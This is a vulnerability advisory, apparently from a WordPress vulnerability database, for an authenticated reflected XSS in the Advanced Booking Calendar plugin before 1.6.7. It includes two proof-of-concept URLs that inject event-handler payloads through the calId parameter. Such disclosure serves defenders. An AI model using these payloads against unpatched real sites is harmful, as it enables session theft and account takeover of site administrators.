WordPress Plugin Vulnerabilities
Advanced Booking Calendar < 1.6.7 - Authenticated Reflected Cross-Site Scripting (XSS)
Description
The plugin did not sanitise the calId GET parameter in the "Seasons & Calendars" page before outputing it in an A tag, leading to a reflected XSS issue
Proof of Concept
Payloads: - Original reporter: /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=calNotDeleted&calId=aaaaaaaa%22+onclick%3Dalert%28123%29%3B%2F%2F - WPScanTeam: /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=calNotDeleted&calId=a%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29+b%3D%22
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
iohex
Submitter
iohex
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-28 (about 3 years ago)
Added
2021-03-28 (about 3 years ago)
Last Updated
2021-03-30 (about 3 years ago)